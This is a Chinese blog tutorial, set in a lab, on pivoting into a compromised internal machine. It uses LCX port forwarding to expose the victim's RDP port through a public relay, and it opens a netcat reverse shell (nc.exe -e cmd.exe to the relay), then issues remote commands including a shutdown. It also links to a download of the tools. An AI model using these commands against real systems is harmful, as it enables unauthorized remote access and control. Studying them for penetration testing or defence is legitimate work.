打开监听端口失败_LCX端口转发及NC反弹

最新推荐文章于 2024-02-07 08:00:00 发布
最新推荐文章于 2024-02-07 08:00:00 发布
阅读量1.1k 收藏 1
点赞数 1
文章标签: 打开监听端口失败
版权声明:本文为博主原创文章,遵循 CC 4.0 BY-SA 版权协议,转载请附上原文出处链接和本声明。
本文链接:https://blog.csdn.net/weixin_26833939/article/details/113329020
版权

fa4b3aa366d2e0c49fbe90d95b768003.png
真理的蜡烛往往会烧伤那些举烛的人的手 —— 布埃斯特

环境

  • 攻击机 kali linux(IP:192.168.96.128)
  • 靶机:win7专业版(IP:192.168.96.130)
  • 公网服务器:centos(IP:就不说了,原因如下)

工具

  1. lcx :windows版是lcx.exe Linux版是portmap
  2. nc.exe

工具地址:https://pan.baidu.com/s/19Lm3H4BN0Yg9e7y0AhdF1A

提取码:mz6j

一.lcx端口转发

首先用xshell登陆到我的服务器

e88c54e085a93df14376c4f649143cdc.png

发现一个警告,一个IP尝试ssh登陆我的服务器,登陆了45次以失败告终,查了一下这个IP,尼泊尔的

1e747872b5c934b9c5da07c362e26707.png

我赶紧lastb查看一下登陆失败的ip

643e80dc0bc0e55b6104f0028787e0fe.png

不查不知道,一查吓一跳,来自几十个ip使用上百个用户名对我的服务器进行爆破过

所以这里我的服务器ip就打码了

1.在公网服务器上开启监听

我们解压工具包,使用ftp工具将portmap上传到服务器

执行命令:./portmap -m 2 -p1 3950 -h2 公网服务器IP -p2 3951

这条命令的意思是公网服务器监听3950端口收到的数据,将其转发到3951端口

6c6086df5af004d9478ccdbd63d52a5b.png

公网服务器开始进行监听

2.在内网肉鸡上将3389端口数据转发到公网服务器

当我们使用msf控制了一台机器后,可以使用upload命令将lcx.exe和nc.exe或是其他木马上传到目标机器,并用execute命令执行程序。

这里直接在靶机cmd进行演示

在靶机上切换到lcx.exe程序目录,执行命令:lcx.exe -slave 公网服务器ip 3950 127.0.0.1 3389

这条命令将内网靶机的3389端口转发到公网服务器的3950端口

8ba5ea4c7be3c3e89ca1004758ac8b24.png

回到公网服务器,已经收到了来自3950端口的数据

3abaa558f72119b7b54263563e904c36.png

3.连接内网肉鸡的远程桌面

打开攻击机,输入rdesktop 公网服务器IP:3951

21091eebd3df1ed8f39d57699775e844.png

成功连接

139e106337dafa94924e1a1037bd53b3.png

回忆一下

我们将内网肉鸡的3389端口转发到了公网服务器的3950端口下,公网服务器将3950收到的数据转发到3951等待处理,然后攻击者连接公网服务器的3951端口,便连接了内网肉鸡的3389端口。

二. nc反弹连接

1.在公网服务器开启nc监听

nc -lvp 3950(监听3950端口)

65303bafbb26e0e02429c0d134af835c.png

2.在内网肉鸡运行nc

切换到nc程序目录,执行nc.exe -t -e cmd.exe 公网服务器IP 3950

37bb03bbfe5b0a3f24a895a0ea1f4aec.png

查看肉鸡上正在运行的程序:tasklist

bfbb1d739f3d773054e576879ddd3f60.png

让肉鸡关机:shutdown -s -t 1

30744fcc70d818c833879fdd1975273c.png

肉鸡已经关机

9d90c7c9848f188def3a94fd46c95403.png

警告

本教程和工具仅供测试,不可用于非法用途。

code4f
关注
lcx端口转发工具
04-11
lcx.exe是个端口转发工具,相当于把肉鸡A上的3389端口转发到B机上,当然这个B机必须有外网IP.这样链接B机的3389度端口就相当于链接A机的3389.
netcat nc端口监听 反向连接中断问题
whatday的专栏
12-09 2816
当系统关闭ipv6时,进行 nc -lvp 5555 的监听时,一连上瞬间会断开,如图: 解决方案:开启nc ipv4 命令如下 nc -4 -lvp 5555 效果如图: 此时就不会断开了 ...
lcx端口转发及远程终端问题
haoge1998的博客
04-27 975
lcx端口转发及远程终端问题 一、lcx端口转发 1、描述 lcx是一款强大的内网端口转发工具,用于将内网主机开放的内部端口映射到外网主机(有公网IP)任意端口。它是一款命令行工具,当然也可以在有权限的webshell下执行,正因如此lcx常被认为是一款黑客入侵工具,lcx在内网入侵渗透中起着重要的角色。lcx进行端口转发的原理就是使不同端口之间形成一个回路。它常用于外网连接内网3389端口。 2、lcx命令 [option:] -listen <ConnectPort> <Transm
Flume 学习笔记 - 使用Flume 监听netcat 指定端口 无法获取信息的解决办法
阿倩要努力啊
11-19 1938
错误描述 今天在搭建好flume之后, 打算运行一个官方的案例, 使用flume监控 netcat端口, 但是一直获取不到数据, 也不报错, 一直找不到原因, 然后当我关闭虚拟机重新打开以后,发现再次监控竟然可以用了! 仔细思考了一下, 然后查询了资料,发现原因可能是我之前打开flumeagent 报错,但是我直接使用ctrl + c 去关闭,但是这种方式是错误的, 这种方法并不能直接关闭, 然后...
记录一次linux端口监听失败的处理过程
程序员
09-08 2044
Linux端口监听失败
telnet|nc 命令返回“连接失败
weixin_53389944的博客
09-13 3060
当使用nc或。
lcx端口转发
01-22
LCX端口转发的工作原理可以简单概括为:当一个数据包到达指定的监听端口时,LCX会捕获这个数据包,修改其目标地址和端口,然后将其发送到新的目的地。这种转发方式可以是单向的,也可以是双向的,即同时处理进站和出...
lcx.exe 端口转发工具
07-15
监听1234端口,转发数据到2333端口 本地:lcx.exe -listen 1234 3389 将目标的3389转发到本地的1234端口 远程:lcx.exe -slave ip 1234 127.0.0.1 3389 另外,还有一条指令: lcx.exe -tran 1234 127.0.0.1 3389
lcx.exe原版 端口转发
12-19
windows下实现端口转发的工具
lcx - HTran 端口转发工具delphi-资料.pas
06-28
* : ======================== HUC Packet Transmit Tool V1.00 ======================= ... * : * : [Usage of Packet Transmit:] * : HTran -|tran|slave> <option> [-log logfile] * : * : [option:] ...
windows使用lcx端口转发登陆远程主机
11-17 501
成功访问,并通过主控制机192.168.31.248 的 3389端口经 51端口转发到192.168.31.211被控制机的3389端口。从第三台主机连接主控制主机3389端口,会直接转发到被控制机的3389端口。192.168.31.211为被控制主机,3389为被控制主机端口。192.168.31.248为远程主控制主机,51为远程主机端口。监听51端口连接并转发到本地3389端口。注:被控制主机上要开启3389端口。启动远程桌面连接,访问主控制主机。成功通过端口转发登陆被控制主机。
windows11内网3389端口映射到公网windows server 2012并访问远程桌面
03-31 1657
在公网服务器windows server 2012 执行51端口监听并转发到33891端口。2.在内网windows11中执行3389端口转发到公网服务器的51端口。成功实现通过内网端口转发方式,公网访问内网远程桌面。3.公网服器直接远程桌面内网windows11。直接通过公网IP连接内网win11远程桌面。1.准备工具lcxwin.exe。
lcx端口转发工具的使用
qq_33411563的博客
12-13 8020
Linux版lcx端口转发工具使用 0x01 前言 在实际情况中,web应用服务通常会被运行在内网机器上,然后通过端口映射到外网,供外网用户进行访问。如果我们已经攻破网站,拿到内网机器权限,通常会安装反弹木马到自己的外网主机,然后在外网主机进行操作。但是,这样操作就会变得很繁琐,需要从自己的内网机登陆到外网主机,然后控制外网主机来对肉鸡进行操作。而lcx端口转发工具可以帮助我们减轻一些负担
【CVE】CVE-2019-9193:PostgreSQL 任意命令执行漏洞
边扯边淡
08-01 3778
【CVE】CVE-2019-9193PostgreSQL任意命令执行漏洞
反弹shell失败 原来是这个原因
梦想闹钟
08-31 6783
在学习反弹shell的相关知识时,尝试在kali2上使用反弹shell 提示有/dev/tcp 这是怎么回事呢?我百度了一下,大部分的说法是这个目录是bash创建的一个虚拟目录,但还是有解决问题,最后在谷歌上找到了解释 https://evilpan.com/2021/04/25/reverse-shell/ 因此还是使用awk命令一句话反弹shell awk 'BEGIN {s = "/inet/tcp/0/127.0.0.1/8080"; while(42) { do{ printf "shell
隧道穿透:端口转发、socket隧道代理
最新发布
qq_68163788的博客
02-07 1938
隧道穿透是一种网络技术,通过端口转发和Socket隧道代理实现安全的网络连接,方便不同网络节点之间的数据传输和通信。端口转发是将网络数据包从一个端口转发到另一个端口的技术,用于将外部网络请求转发到内部网络。Socket隧道代理利用Socket连接建立隧道,在客户端和服务器端之间传输数据,提高数据传输的安全性和效率。这些方法可以确保数据传输的安全和顺畅,适用于需要跨越不同网络环境进行通信的场景。
传输层隧道通信-lcx
qq_54735393的博客
03-08 280
学习熟悉lcx
Linux 端口侦听不到,在linux上,如何在不尝试连接的情况下检查端口是否处于侦听状态...
weixin_39860757的博客
04-30 117
如果本地计算机上的端口(如果通过IP或接口也需要)处于侦听状态,我如何检查?我不想连接到这个端口进行检查,因为我不想激怒这个端口后面的服务.我想用它来将缺少的net.tcp.listen项添加到Zabbix.编辑 – 这是真正的答案:正确的方法是读取套接字表:的/ proc /净/ TCP的/ proc /净/ TCP6它们包含如下行:sl local_address rem_address ...
内网端口转发实战:LCX教程
"LCX使用教程介绍了如何利用此工具进行内网端口转发,解决外网访问内网特定服务的问题。在实际网络环境中,由于防火墙和安全策略,直接从外网访问内网服务通常受到限制。Lcx.exe作为一个端口转发工具,通过在被控制...
评论
添加红包

请填写红包祝福语或标题

红包个数最小为10个

红包金额最低5元

当前余额3.43前往充值 >
需支付:10.00
成就一亿技术人!
领取后你会自动成为博主和红包主的粉丝 规则
hope_wisdom
发出的红包
实付
使用余额支付
点击重新获取
扫码支付
钱包余额 0

抵扣说明:

1.余额是钱包充值的虚拟货币,按照1:1的比例进行支付金额的抵扣。
2.余额无法直接购买下载,可以购买VIP、付费专栏及课程。

余额充值